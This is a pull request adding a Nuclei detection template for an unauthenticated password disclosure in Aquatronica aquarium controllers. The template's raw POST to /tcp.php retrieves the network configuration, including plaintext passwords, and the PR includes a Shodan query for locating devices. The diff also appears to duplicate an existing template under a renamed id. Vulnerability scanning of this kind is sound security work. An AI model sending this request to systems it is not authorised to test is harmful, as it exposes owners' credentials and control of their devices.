### PR TITLE
add aquatronica control system

### DIFF
--- a/http/vulnerabilities/other/aquatronica-info-leak.yaml
+++ b/http/vulnerabilities/other/aquatronica-info-leak.yaml
@@ -1,4 +1,4 @@
-id: aquatronica-password-disclosure
+id: aquatronica-info-leak
 
 info:
   name: Aquatronica Control System 5.1.6 - Information Disclosure
@@ -9,11 +9,12 @@ info:
   reference:
     - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
     - https://www.exploit-db.com/exploits/52028
+    - https://www.zeroscience.mk/codes/aqua.txt
   metadata:
     verified: true
     max-request: 1
     shodan-query: html:"aquatronica"
-  tags: exploitdb,aquatronica
+  tags: exploitdb,aquatronica,info-leak
 
 http:
   - raw:

--- a/http/vulnerabilities/other/aquatronica-password-disclosure.yaml
+++ b/http/vulnerabilities/other/aquatronica-password-disclosure.yaml
@@ -1,0 +1,37 @@
+id: aquatronica-password-disclosure
+
+info:
+  name: Aquatronica Control System 5.1.6 - Information Disclosure
+  author: securityforeveryone
+  severity: high
+  description: |
+    The tcp.php endpoint on the Aquatronica controller is exposed to unauthenticated attackers over the network. This vulnerability allows remote attackers to send a POST request which can reveal sensitive configuration information, including plaintext passwords. This can lead to unauthorized access and control over the aquarium controller, compromising its security and potentially allowing attackers to manipulate its settings.
+  reference:
+    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
+    - https://www.exploit-db.com/exploits/52028
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"aquatronica"
+  tags: exploitdb,aquatronica
+
+http:
+  - raw:
+      - |
+        POST /tcp.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        function_id=tcp_xml_request&command=WS_GET_NETWORK_CFG
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "WEB_PASSWORD"
+          - "pwd=&quot;"
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
I built it based on the code from Exploitdb. 
The template leaks the password for the Aquatronica Control System. I also used the parameters returned on the response as a matcher.

```
Aquatronica's electronic AQUARIUM CONTROLLER is easy to use, allowing you to control all the electrical devices in an aquarium and to monitor all their parameters; it can be used for soft water aquariums, salt water aquariums or both simultaneously.
```
```
The tcp.php endpoint on the Aquatronica controller is exposed to unauthenticated attackers over the network. This vulnerability allows remote attackers to send a POST request which can reveal sensitive configuration information, including plaintext passwords. This can lead to unauthorized access and control over the aquarium controller, compromising its security and potentially allowing attackers to manipulate its settings.

```
References: https://www.exploit-db.com/exploits/52028

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)